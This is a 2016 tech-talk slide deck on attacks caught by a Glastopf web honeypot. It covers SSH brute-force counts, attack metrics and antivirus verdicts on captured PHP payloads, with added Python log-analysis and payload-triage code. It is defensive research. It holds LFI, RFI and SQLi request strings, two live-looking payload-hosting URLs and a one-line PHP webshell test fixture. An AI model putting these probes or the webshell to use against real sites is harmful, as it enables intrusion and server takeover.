Web Attack Threat Analysis Experiences with Glastopf honeypot CAE Tech Talk – February 2016 Safwan Omari
[email protected] Assistant professor of MIS College of Business - Lewis University
Outline • Honeypot • Deployment • Attack trends • Terminology • Attack results • Collected payloads
February 18, 2016
CAE Tech Talk
2
Honeypot – glastopf • Emulates web-based vulnerabilities • Attracts attackers through Google dorks, e.g. inurl:"category.asp?catid=" and inurl:"content.asp?id="
• Glastopf advertises thousands of vulnerabilities (emulated, not real); search engines index the dork-matching pages, which is how attackers find the honeypot
Dork type | Number | Grew to
inurl     | 3507   | 10,351
intext    | 189    | same
intitle   | 346    | same
Type of vulnerabilities

Vulnerability                                | Possible attacks
Local File Inclusion / Remote File Inclusion | code execution on the client side, e.g. JavaScript (XSS); code execution on the web server; sensitive information disclosure; denial of service (DoS)
SQLi                                         | disclosure of sensitive information; data corruption; loss of data
Type of vulnerabilities cont'd

Vulnerability | Description / possible attacks
Style CSS     | XSS via injection of JavaScript into a CSS style sheet; disclosure of sensitive data; runs JavaScript in the victim's browser; HTTP session hijacking
phpMyAdmin    | web-based administration interface for MySQL databases; multiple vulnerabilities; execution of arbitrary commands; compromise of the system
phpinfo       | PHP script that discloses server/PHP information: server OS version, WWW root directory, PHP configuration
Example- LFI • http://192.168.56.101/index.php?index=../../../../etc/passwd
Example - RFI • http://192.168.56.101/index.php?index=http://pastebin.com/raw.php?i=GK9m8dAL
Example - SQLi • http://192.168.56.101/index.php?id=22 SELECT database()
Example - SQLi • http://192.168.56.101/index.php?id=22 SELECT user()
Web application products • phpmyadmin • PHP enter • php-fusion module • Xerox docushare • Foafgen 0.3 • J-Pierre DEZELUS Les Visiteurs 2.0.1 • Many others (php-based and ASP-based)
Deployment • Comcast business-class network, completely separate from the University network • Given DNS names: www, smtp, financials • With little effort an attacker could tell it is a university network • A hacker with moderate experience should be able to figure out that it is a decoy system
Defending the honeypot • Attackers don't play by the rules: they tried to take over the machine by launching brute-force attacks against sshd • Logged in daily to monitor activity • Successful and failed login attempts • Rootkit checks (rkhunter, chkrootkit)
• Fighting bots and backdoors • Monitor all outgoing connections • Monitor open ports
Login attempts • 7143 login attempts originated from 125 unique IPs • From 25 countries: HK (4714), CN (916), FR (506), VN (301)
• User names tried (account, alex, apache, backup, D-Link and many more) • root: 5648 • support: 926 • admin: 220
• One IP (43.229.x.x, HK) tried 4150 times • Rest: range from 1 to 524 • Average: 57 attempts per IP, 24 without the HK attacker
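The per-IP and per-username counts above come straight out of sshd's syslog output. The following is an added example for this talk, not code from the honeypot project or from Glastopf: it parses OpenSSH "Failed password" and "Accepted" lines, produces the same counts (including the average with the single dominant source removed, as the slide does), and flags accepted logins from sources that also brute-forced. The log lines are constructed, the hostname, PIDs and IP addresses are made up, and the country breakdown is left out because it needs a GeoIP database.

```python
"""Summarise sshd brute-force activity from auth.log lines (added example)."""
import re
from collections import Counter
from typing import Dict, Iterable, List, Set, Tuple

# OpenSSH's standard syslog wording; "invalid user" appears when the account does not exist.
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2"
)
ACCEPTED_RE = re.compile(
    r"Accepted (?:password|publickey) for (?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)

# Constructed sample log (not captured data); 43.229.0.1 plays the dominant source.
SAMPLE_AUTH_LOG = """\
Dec  6 02:31:10 honey sshd[2101]: Failed password for root from 43.229.0.1 port 51422 ssh2
Dec  6 02:31:12 honey sshd[2101]: Failed password for root from 43.229.0.1 port 51423 ssh2
Dec  6 02:31:15 honey sshd[2103]: Failed password for invalid user support from 43.229.0.1 port 51430 ssh2
Dec  6 02:40:01 honey sshd[2150]: Failed password for invalid user admin from 203.0.113.7 port 40012 ssh2
Dec  6 02:40:03 honey sshd[2150]: Failed password for root from 203.0.113.7 port 40013 ssh2
Dec  6 03:05:44 honey sshd[2201]: Failed password for invalid user D-Link from 198.51.100.9 port 3300 ssh2
Dec  6 03:07:00 honey sshd[2210]: Accepted publickey for analyst from 192.0.2.10 port 5000 ssh2: RSA SHA256:abc
Dec  6 03:09:00 honey sshd[2211]: Accepted password for root from 203.0.113.7 port 40020 ssh2
"""

Attempt = Tuple[str, str]  # (source ip, username)


def parse_auth_log(lines: Iterable[str]) -> Tuple[List[Attempt], List[Attempt]]:
    """Return (failed, accepted) login attempts found in the given lines."""
    failed: List[Attempt] = []
    accepted: List[Attempt] = []
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            failed.append((m["ip"], m["user"]))
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted.append((m["ip"], m["user"]))
    return failed, accepted


def summarise(failed: List[Attempt]) -> Dict[str, object]:
    """Counts per IP and per username, plus the mean with and without the top source."""
    by_ip = Counter(ip for ip, _ in failed)
    by_user = Counter(user for _, user in failed)
    total = len(failed)
    unique_ips = len(by_ip)
    top_ip, top_n = by_ip.most_common(1)[0] if by_ip else ("", 0)
    # One source can dominate the mean, so report it with and without that source.
    avg = total / unique_ips if unique_ips else 0.0
    avg_without_top = (total - top_n) / (unique_ips - 1) if unique_ips > 1 else 0.0
    return {
        "total": total,
        "unique_ips": unique_ips,
        "by_ip": by_ip,
        "by_user": by_user,
        "top_ip": (top_ip, top_n),
        "avg_per_ip": avg,
        "avg_without_top": avg_without_top,
    }


def suspicious_logins(accepted: List[Attempt], failed: List[Attempt],
                      allowlist: Set[str]) -> List[Attempt]:
    """Accepted logins from an IP outside the operator's allowlist, or from an IP
    that also produced failures (a brute force that eventually got in)."""
    brute_sources = {ip for ip, _ in failed}
    return [(ip, user) for ip, user in accepted
            if ip not in allowlist or ip in brute_sources]


if __name__ == "__main__":
    failed, accepted = parse_auth_log(SAMPLE_AUTH_LOG.splitlines())
    s = summarise(failed)
    print(f"{s['total']} failed attempts from {s['unique_ips']} IPs")
    for user, n in s["by_user"].most_common(3):
        print(f"  {user}: {n}")
    print("suspicious accepted logins:", suspicious_logins(accepted, failed, {"192.0.2.10"}))
```

On a real honeypot the allowlist is the operator's management address; anything else that is accepted, especially after failures from the same source, is the "attacker took over the machine" case the slide warns about and should be checked with the rootkit scanners immediately.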
Terminology/metrics • Event: any HTTP request • Attack: a set of events originating from the same IP • Some attackers were determined and came back a few times, so the time between events had to be taken into account when splitting events into attacks
• Length of an attack: time between the first and last events • Number of events in an attack • Number of patterns in an attack (LFI, RFI, SQLi, etc.)
Attack - examples • 202.67.X.X – attack 1 (12 events)
• 2015-12-06 02:32:28 /view_faq.php?id=999999.9 or 1=1 • 2015-12-06 02:32:40 /view_faq.php?id=' • 2015-12-06 02:33:00 /view_faq.php?id= union all select null,null,null,null,null,null--
• 202.67.X.X – attack 2 (25 events)
• 2015-12-14 01:42:14 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc= • 2015-12-14 01:42:34 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc=9999 and 1=1 • 2015-12-14 01:42:39 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc='
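The terminology slide defines events, attacks and the three per-attack metrics, and the two attacks above show why a time gap is needed: the same source came back eight days later. The block below is an added example, not Glastopf's own classification or analysis code. It tags each request with one of the event types used later in the talk (RFI, LFI, phpmyadmin, phpinfo, style_css, SQLi, unknown), groups events per IP into attacks using an assumed 30-minute gap, and computes duration, event count and number of distinct patterns, plus the "returning attacker" and "one-event attack" figures. The regexes are assumptions chosen to cover the requests shown in the talk; the sample log is constructed from those requests with documentation IP addresses instead of the masked 202.67.X.X.

```python
"""Classify honeypot HTTP events and group them into attacks (added example)."""
import re
from collections import Counter
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Optional, Set
from urllib.parse import unquote_plus

SESSION_GAP = timedelta(minutes=30)  # assumption: a longer silence from one IP starts a new attack

# First match wins, so the more specific patterns come first (an RFI URL also
# contains characters the SQLi pattern would otherwise pick up).
PATTERNS = [
    ("rfi", re.compile(r"=\s*(?:https?|ftp)://", re.I)),
    ("lfi", re.compile(r"(?:\.\./|\.\.\\|/etc/passwd|boot\.ini|/proc/self/environ)", re.I)),
    ("phpmyadmin", re.compile(r"(?:phpmyadmin|/pma/)", re.I)),
    ("phpinfo", re.compile(r"phpinfo", re.I)),
    ("style_css", re.compile(r"\.css(?:$|\?)", re.I)),
    ("sqli", re.compile(r"(?:'|%27|\bunion\b.*\bselect\b|\b(?:and|or)\b\s+\d+\s*=\s*\d+)", re.I)),
]


class Event(NamedTuple):
    ts: datetime
    ip: str
    path: str
    pattern: str


@dataclass
class Attack:
    ip: str
    start: datetime
    end: datetime
    num_events: int = 0
    patterns: Set[str] = field(default_factory=set)  # "unknown" is not counted as a pattern

    @property
    def duration_seconds(self) -> float:
        return (self.end - self.start).total_seconds()


def classify(path: str) -> str:
    """Map a request path (with query string) to one of the talk's event types."""
    decoded = unquote_plus(path)
    for name, rx in PATTERNS:
        if rx.search(decoded):
            return name
    return "unknown"


def parse_log(text: str) -> List[Event]:
    """Lines are 'YYYY-MM-DD HH:MM:SS <ip> <path>'; the path may contain spaces."""
    events: List[Event] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, ip, path = line.split(" ", 3)
        ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
        events.append(Event(ts, ip, path, classify(path)))
    return events


def sessionize(events: List[Event], gap: timedelta = SESSION_GAP) -> List[Attack]:
    """Group events into attacks: same IP, and no silence longer than `gap`."""
    attacks: List[Attack] = []
    current: Optional[Attack] = None
    for ev in sorted(events, key=lambda e: (e.ip, e.ts)):
        if current is None or ev.ip != current.ip or ev.ts - current.end > gap:
            current = Attack(ip=ev.ip, start=ev.ts, end=ev.ts)
            attacks.append(current)
        current.end = ev.ts
        current.num_events += 1
        if ev.pattern != "unknown":
            current.patterns.add(ev.pattern)
    return attacks


def returning_attackers(attacks: List[Attack]) -> Dict[str, int]:
    """IPs with more than one attack, with their attack counts."""
    counts = Counter(a.ip for a in attacks)
    return {ip: n for ip, n in counts.items() if n > 1}


def single_event_fraction(attacks: List[Attack]) -> float:
    """Share of attacks that consist of a single request (view the home page and leave)."""
    return sum(1 for a in attacks if a.num_events == 1) / len(attacks) if attacks else 0.0


# Constructed sample built from the requests shown in the talk (IPs are documentation addresses).
SAMPLE_LOG = """\
2015-12-06 02:32:28 203.0.113.5 /view_faq.php?id=999999.9 or 1=1
2015-12-06 02:32:40 203.0.113.5 /view_faq.php?id='
2015-12-06 02:33:00 203.0.113.5 /view_faq.php?id= union all select null,null,null,null,null,null--
2015-12-06 02:33:30 203.0.113.5 /index.php?index=../../../../etc/passwd
2015-12-14 01:42:14 203.0.113.5 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc=
2015-12-14 01:42:34 203.0.113.5 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct.asp?misc=9999 and 1=1
2015-12-06 02:35:00 198.51.100.4 /
2015-12-06 02:36:10 198.51.100.4 /index.php?index=http://pastebin.com/raw.php?i=GK9m8dAL
2015-12-06 02:36:12 198.51.100.4 /phpmyadmin/scripts/setup.php
2015-12-07 10:00:00 192.0.2.77 /
"""

if __name__ == "__main__":
    attacks = sessionize(parse_log(SAMPLE_LOG))
    for a in attacks:
        print(f"{a.ip}: {a.num_events} events, {a.duration_seconds:.0f} s, patterns={sorted(a.patterns)}")
    print("returning:", returning_attackers(attacks), "single-event:", single_event_fraction(attacks))
```

The gap value decides how many "attacks" a persistent source produces, so it should be stated alongside any attack counts; the sorted-by-(ip, time) pass makes the split independent of the order the web server logged the requests in.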
Attack world map [figure: world map of attack source locations]
Attack trends [figure: two plots over the roughly 40-day collection window, events per day (0 to 5000) and attacks per day (0 to 400); x axis: day]
Event types

Type                  | Number | Percentage
Phpinfo               | 15     | 0%
RFI                   | 65     | 0.1%
LFI                   | 315    | 0.4%
XSS – CSS stylesheet  | 660    | 0.8%
Phpmyadmin            | 7894   | 9.9%
SQLi                  | 42,572 | 53.3%
Unknown               | 27,071 | 35.4%
Attack events cont'd • LFI • Attackers are after c:\boot.ini and /etc/passwd
• RFI • http://u-braci.pl/components/com_user/Jubar.txt (Poland) • http://ropadeportiva.sexy/wp-includes/images/id.flv (GoDaddy)
Top 10 countries - events [pie chart]: Indonesia 39%, USA 30%, Morocco 6%, France 5%, Brazil 3%, Russia 2%, SG 2%, Turkey 2%, China 2%, KR 1%, Other 8%
Top 10 countries - attacks [pie chart]: USA 24%, Indonesia 15%, China 12%, Russia 6%, Brazil 5%, France 3%, NL 2%, DE 2%, MA 2%, UA 2%, Other 27%
Attack diversity [figure: stacked bar chart, 0% to 100%, of event types (unknown, style_css, sqli, phpinfo, RFI, LFI, phpmyadmin) per country for Brazil, France, Morocco, USA and Indonesia]
Attack characteristics

Country | avg. duration (min) | avg. events/attack | total attacks
BR      | 1.0                 | 16                 | 147
FR      | 0.5                 | 39                 | 94
MA      | 3.7                 | 74                 | 66
US      | 0.4                 | 31                 | 764
ID      | 3.6                 | 66                 | 479
RU      | 0.6                 | 7                  | 185
CN      | 3.5                 | 5                  | 375
Attack characteristics cont'd • One-event attacks • View the home page and leave (20% of attacks)
• Time between events • events per second range from 0.0019 to 11.6
• Multiple attacks • 10% of attackers came back for more than one attack
Time of attacks [figure: bar chart of attacks (0 to 70) by hour of day, 0 to 23]
Malware analysis • malwr • Free open malware analysis service based on Cuckoo • Traces system calls (APIs) • Captures and analyzes network traffic • Memory analysis with Volatility
• virustotal • A free online service and subsidiary of Google • Runs multiple antivirus engines and aggregates results • AegisLab, Agnitum, Alibaba, Antiy-AVL, AVG, ClamAV, etc. (54 engines)
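Before a captured payload goes to malwr or VirusTotal, it is worth the few seconds of local triage that produce the identifiers used in the table that follows (an MD5-based label and the size) and a first opinion on what kind of PHP file it is, since the engines on the next slides label the detected payloads as PHP webshells and a mass mailer. The block below is an added example, not part of the talk or of either service: it hashes the payload, sniffs whether it is PHP or HTML, counts a few static webshell and mailer indicators, and returns a verdict. The indicator list and the verdict rules are assumptions of this example; the three payloads are constructed test fixtures, not the captured files from the table.

```python
"""Static triage of captured RFI payloads before sandbox/AV submission (added example)."""
import hashlib
import re
from typing import Dict, List, Tuple

# Indicators a PHP webshell or spam script tends to carry; names are this example's own.
WEBSHELL_INDICATORS: List[Tuple[str, "re.Pattern[bytes]"]] = [
    ("eval", re.compile(rb"\beval\s*\(")),
    ("base64_decode", re.compile(rb"base64_decode\s*\(")),
    ("shell_exec", re.compile(rb"\b(?:shell_exec|system|passthru|exec|popen|proc_open)\s*\(")),
    ("request_input", re.compile(rb"\$_(?:GET|POST|REQUEST|COOKIE)\[")),
    ("mail", re.compile(rb"\bmail\s*\(")),
    ("fsockopen", re.compile(rb"\bfsockopen\s*\(")),
]


def sniff_kind(data: bytes) -> str:
    """Coarse file type from the first 4 KiB, enough to separate PHP from fetched HTML."""
    head = data[:4096]
    if b"<?php" in head or b"<?=" in head:
        return "php"
    if re.search(rb"<(?:!doctype\s+)?html", head, re.I):
        return "html"
    return "other"


def triage(data: bytes) -> Dict[str, object]:
    """Hashes, size, sniffed kind, indicator hits and a coarse verdict for one payload."""
    md5 = hashlib.md5(data).hexdigest()
    hits = [name for name, rx in WEBSHELL_INDICATORS if rx.search(data)]
    takes_input = "request_input" in hits
    if takes_input and ({"eval", "shell_exec"} & set(hits)):
        verdict = "webshell-like"      # attacker-controlled input reaches code/command execution
    elif takes_input and "mail" in hits:
        verdict = "mailer-like"        # attacker-controlled recipients/body reach mail()
    else:
        verdict = "needs-sandbox"      # nothing conclusive statically; send to Cuckoo/VirusTotal
    return {
        "label": f"Payload-{md5[:5]}",  # same short-label style as the talk's payload table
        "md5": md5,
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": len(data),
        "kind": sniff_kind(data),
        "indicators": hits,
        "verdict": verdict,
    }


# Constructed fixtures for the three cases (not the captured payloads from the talk).
FIXTURE_SHELL = b"<?php if(isset($_POST['c'])){ @eval(base64_decode($_POST['c'])); } ?>"
FIXTURE_MAILER = b"<?php $to=$_POST['to']; mail($to, $_POST['s'], $_POST['b']); ?>"
FIXTURE_HTML = b"<!DOCTYPE html><html><body>Hello</body></html>"

if __name__ == "__main__":
    for blob in (FIXTURE_SHELL, FIXTURE_MAILER, FIXTURE_HTML):
        t = triage(blob)
        print(t["label"], t["size"], t["kind"], t["verdict"], t["indicators"])
```

A "needs-sandbox" result is not a clean bill of health: obfuscated shells hide the function names this looks for, which is exactly why the talk runs every payload through malwr and VirusTotal as well.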
Payloads

MD5 fingerprint | Size (bytes) | Date       | Country             | Malwr fingerprints | VirusTotal hits
Payload-0f788   | 112350       | 2015-12-06 | Newtown Square, USA | 3                  | 0/54
Payload-85a78   | 41155        | 2015-12-28 | Samara, RU          | 0                  | 13/54
Payload-214db   | 1116         | 2016-01-01 | Bogotá, CO          | 1                  | 35/54
Payload-432d0   | 112267       | 2015-12-13 | NL                  | 1                  | 0/54
Payload-9162c   | 5794         | 2016-01-03 | Lassance, BR        | 0                  | 4/54
Payload-9860d   | 112302       | 2015-12-15 | Zurich, CH          | 1                  | 0/54
Payload-a38d2   | 95138        | 2015-12-10 | Redwood City, US    | 3                  | 0/52
Payload-0f788 • Malwr fingerprints • Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) • Installs itself for autorun at Windows startup
Payload-85a78 • Malwr did not detect any fingerprints • VirusTotal: 13 hits/54

Engine         | Detection
AegisLab       | Script.Troj.Agent!c
AhnLab-V3      | JS/SARS.S61
Avast          | PHP:Agent-MN [Trj]
Bkav           | CPRA349.Webshell
DrWeb          | PHP.Siggen.16
ESET-NOD32     | PHP/Obfuscated.E potentially unwanted
GData          | Script.Trojan.Agent.MD5H0A
Ikarus         | Backdoor.PHP.WebShell
NANO-Antivirus | Trojan.Html.Agent.bzzhwy
Qihoo-360      | php.dkshell.0.116
Sophos         | Troj/PhpShel-G
Symantec       | PHP.Filesman
VBA32          | suspected of Trojan.PHP.Obfuscated
Payload-214db • Malwr fingerprints • Installs itself for autorun at Windows startup
• VirusTotal: 35 hits/54

Engine(s)                                                                          | Detection
ALYac, Ad-Aware, Arcabit, F-Secure, GData, MicroWorld-eScan, nProtect, Bitdefender | Backdoor.PHP.ALI
AVG                                                                                | PHP/BackDoor.AG
AegisLab, Antiy-AVL, Kaspersky                                                     | Backdoor.PHP.PhpShell.bj!c
Agnitum                                                                            | PHP.ShellBot.M
AhnLab-V3                                                                          | PHP/Shellexec
Avast                                                                              | PHP:Agent-RV [Trj]
Avira                                                                              | PHP/Shell.CA.2
Bkav                                                                               | VEX2650.Webshell
CAT-QuickHeal                                                                      | HTML.BackDoor.A
ClamAV                                                                             | PHP.Shell-23
Comodo                                                                             | UnclassifiedMalware
Cyren, F-Prot                                                                      | PHP/Small.D
DrWeb                                                                              | PHP.Shell.35
ESET-NOD32                                                                         | PHP/Small.NAL
Emsisoft                                                                           | Backdoor.PHP.ALI (B)
Ikarus                                                                             | Backdoor.PHP.Agent
Microsoft                                                                          | Backdoor:PHP/Shell.C
NANO-Antivirus                                                                     | Trojan.Html.Zapchast.bubnpf
Qihoo-360                                                                          | Malware.Radar01.Gen
Sophos                                                                             | Troj/PHPBdoor-A
Tencent                                                                            | Php.Backdoor.Phpshell.Hnuz
TrendMicro, TrendMicro-HouseCall                                                   | PHP_SHELL.GLT
VBA32                                                                              | Backdoor.PHP.Rst.f
VIPRE                                                                              | Backdoor.PHP.C99shell.a (v)
Payload-432d0 • Malwr fingerprints • Installs itself for autorun at Windows startup
Payload-9162c • Malwr did not detect any fingerprints • VirusTotal: 4 hits/54

Engine         | Detection
AhnLab-V3      | PHP/Massmailer
Avira          | PHP/MassMail.4127
NANO-Antivirus | Trojan.Html.Mailar.yrjmu
Qihoo-360      | php.script.mailsend.3
Payload-9860d • Malwr fingerprints • Installs itself for autorun at Windows startup
Payload-a38d2 • Malwr fingerprints • Installs itself for autorun at Windows startup • Performs some HTTP requests (User-Agent: Microsoft-WebDAVMiniRedir/5.1.2600) • Generates some ICMP traffic
Future work • Look more closely into events • Correlate events to discover bots • Fingerprint the attack tools in use
• Perform more detailed malware analysis of the captured payloads • Change the decoy's persona and see how the attacks change: pose as a bank or a clinic
Acknowledgment • Swetha Rajshree, graduate student, for her contribution throughout this project
• Faisal Abdullah (Chair) and Rami Khasawneh (Dean) for providing access to the computing and network resources that made this work possible